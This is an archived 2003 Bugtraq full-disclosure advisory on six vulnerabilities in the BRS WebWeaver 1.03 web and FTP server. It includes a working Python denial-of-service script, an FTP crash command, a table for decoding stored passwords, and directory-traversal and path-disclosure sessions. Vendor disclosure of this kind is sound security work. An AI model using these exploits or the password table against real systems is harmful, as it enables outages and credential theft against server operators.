[<prev] [next>] [day] [month] [year] [list]
Message-ID: <3E888A7E.000005.24135@soapbox.yandex.ru>
Date: Mon, 31 Mar 2003 22:35:42 +0400 (MSD)
From: "euronymous" <just-a-user@...dex.ru>
To: vuln@...urity.nnov.ru, bugtraq@...urityfocus.com
Subject: BRS WebWeaver: full disclosure
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: BRS WebWeaver: full disclosure
product: BRS WebWeaver 1.03
vendor: http://www.brswebweaver.com
risk: high
date: 31/03/2k3
tested platform: Windows 98 Second Edition
discovered by: euronymous /F0KP
advisory urls: http://f0kp.iplus.ru/bz/019.en.txt
http://f0kp.iplus.ru/bz/019.ru.txt
contact email: euronymous@...us.ru
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
Issues
------
1. Dos Device Path vulnerability in FTP Server
2. Long URL DoS in HTTP Server
3. Weak Encryption Sheme
4. Remote System Information Gathering
5. Path Disclosure in FTP Server
6. Directory Traversal in FTP Server
1. Dos Device Path vulnerability in FTP Server
----------------------------------------------
i have found, that FTP server doesnt checks path, typed by user.
malicious local user can crash FTP (and HTTP also) server on
non-patched Windows98 machine.
just type this command in WebWeaver ftp session:
cd /aux/aux/
After this server goes down..
Solutions:
1) Apply corresponding patch for your windows
2) Wait for new version of WebWeaver
3) Remove this crap at all ))
2. Long URL DoS in HTTP Server
------------------------------
If any local/remote user pass to http server url, that contain
2499361 charakters, then server was crashed in 2-5 minutes.
It will eat all RAM and finally hang up whole system. Need to
reboot. Exploit as below:
}------- start of fWWhtdos.py ---------------{
#! /usr/bin/env python
###
# WebWeaver 1.03 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fWWhtdos.py target
# Ex.: ./fWWhtdos.py 127.0.0.1
########
import sys, httplib
target = sys.argv[1]
spl = "f"*2499361
conn = httplib.HTTPConnection(target)
conn.request("GET", "/"+spl)
r1 = conn.getresponse()
print r1.status
}--------- end of fWWhtdos.py ---------------{
following is appear in error.log of WebWeaver:
}-------------------------- start of error.log ------------------------{
31/Mar/2003:04:28:52 LOG_ALERT ERROR: Thread Manager TerminateThreads Timed Out
31/Mar/2003:04:28:52 LOG_ALERT ERROR: Thread Manager TerminateThreads Timed Out
31/Mar/2003:04:28:52 LOG_WARNING Admin Thread NOT Stopped! NOT ASSIGNED!
}--------------------------- end of error.log -------------------------{
Solutions:
1) Wait for new version of WebWeaver
2) Remove this crap at all ))
3. Weak Encryption Sheme
------------------------
Webweaver `encrypt' ftp-users passwords and all password
hashes stored in \config\users.ini file under WebWeaver
installation directory. Data is stored in following format:
user=hashed_passwd
Passwords arent case-sensivity for WebWeaver. Below you can
see encryption table:
g i k m o q s u w e == encrypted
1 2 3 4 5 6 7 8 9 0 == plain
з у П й н ч п Ч г е ╩ © == encrypted
q w e r t y u i o p [ ] == plain
З л Н С У Х Щ Ы Э { S == encrypted
a s d f g h j k l ; ' == plain
щ х Л с Й б Я ] a c == encrypted
z x c v b n m , . / == plain
Any local user can to get this file [users.ini] and
`decrypt' user passwords.
Solutions:
1) Wait for WebWeaver vendor implement strong encryption
sheme like MD5 and BlowFish.
2) Remove this crap at all )).
4. Remote System Information Gathering
--------------------------------------
Any remote user can get many useful information about
system, where BRS WebWeaver is installed. If within
installation procedure test cgi scripts was installed
[in default], then it will enough to go to this url:
http://hostname/scripts/testcgi.exe
}--------------- start of testcgi.exe output ---------------{
CGI Test Program
Arguments To Testcgi
Argument 1 :
Environment Variables
HTTP_CONNECTION = keep-alive
HTTP_KEEP_ALIVE = 300
HTTP_ACCEPT_CHARSET = utf-8,*
HTTP_ACCEPT_ENCODING = gzip,deflate,compress;q=0.9
HTTP_ACCEPT_LANGUAGE = ru-ru,ru;q=0.5
HTTP_ACCEPT = text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
HTTP_USER_AGENT = Mozilla/5.0 (Windows; U; Win98; ru-RU; rv:1.3) Gecko/20030309
HTTP_HOST = localhost
SERVER_PORT = 80
URL = /scripts/testcgi.exe
LOCAL_ADDR = 195.***.**.**
CONTENT_LENGTH = 0
SERVER_SOFTWARE = BRS WebWeaver/1.03
SERVER_PROTOCOL = HTTP/1.0
SERVER_NAME = ******30
REMOTE_HOST = 127.0.0.1
REMOTE_ADDR = 127.0.0.1
REQUEST_METHOD = GET
DOCUMENT_ROOT = c:\program files\webweaver
SCRIPT_NAME = /scripts/testcgi.exe
GATEWAY_INTERFACE = CGI/1.1
WINDIR = C:\WINDOWS
CMDLINE = WIN
COMSPEC = C:\WINDOWS\COMMAND.COM
PATH = C:\WINDOWS;C:\WINDOWS\COMMAND
WINBOOTDIR = C:\WINDOWS
PROMPT = $p$g
TEMP = C:\WINDOWS\TEMP
TMP = C:\WINDOWS\TEMP
Miscellaneous Information
Working directory: C:/Program Files/WebWeaver/scripts/
Current date and time: 2003/03/31 5:07:32
}--------------- end of testcgi.exe output ---------------{
Solution: Remove this script from /scripts/ directory.
5. Path Disclosure in FTP Server
--------------------------------
I wrote about this vulnerability in v1.01 of WebWeaver
already: http://f0kp.iplus.ru/bz/012.en.txt
It was published in Bugtraq mailing list, but in v1.03
this flaw else doesnt was fixed.
}-------------- sample session -----------{
220 BRS WebWeaver FTP Server ready.
User (********.***.*****.***:(none)): 123
331 Password required for 123.
Password:
230 User 123 logged in.
ftp> pwd
257 "/" is current directory.
ftp> mkdir test
257 '/test': directory created.
ftp> mkdir test
550 'c:\ftp\test': can't create directory.
ftp> rmdir test
250 '/test': directory removed.
ftp> rmdir test
550 'c:\ftp\test': no such directory.
ftp>
}-------------- sample session -----------{
So, if user make attempt to create already existent
directory or remove unexistent directory, then
Ftp server will output full system path.
Solutions:
1) Wait for new version of WebWeaver
2) Remove this crap at all ))
6. Directory Traversal in FTP Server
------------------------------------
I wrote about this vulnerability in v1.01 of WebWeaver
already: http://f0kp.iplus.ru/bz/012.en.txt
It was published in Bugtraq mailing list, but in v1.03
this flaw else doesnt was fixed.
}-------------- sample session -----------{
220 BRS WebWeaver FTP Server ready.
User (********.***.*****.***:(none)): 123
331 Password required for 123.
Password:
230 User 123 logged in.
ftp> pwd
257 "/" is current directory.
ftp> mkdir ../test
257 '/..\test': directory created.
ftp> rmdir ../test
250 '/..\test': directory removed.
ftp> mkdir ../windows/test
257 '/..\windows\test': directory created.
ftp> rmdir ../windows/test
250 '/..\windows\test': directory removed.
ftp>
}-------------- sample session -----------{
How you can see any user can exploit this traversal
bug for creating and removing directories outside
ftp_root. But user cannot use more useful commands
like `ls', `dir'.
Solutions:
1) Wait for new version of WebWeaver
2) Remove this crap at all ))
shouts: R00tC0de, DWC, DHG, HUNGOSH, security.nnov.ru, all russian
security guyz!! to kate especially ))
f*ck_off: slavomira and other dirty ppl in *.kz $#%&^! k0dsweb
f*cking team
================
im not a lame,
not yet a hacker
================
Powered by blists - more mailing lists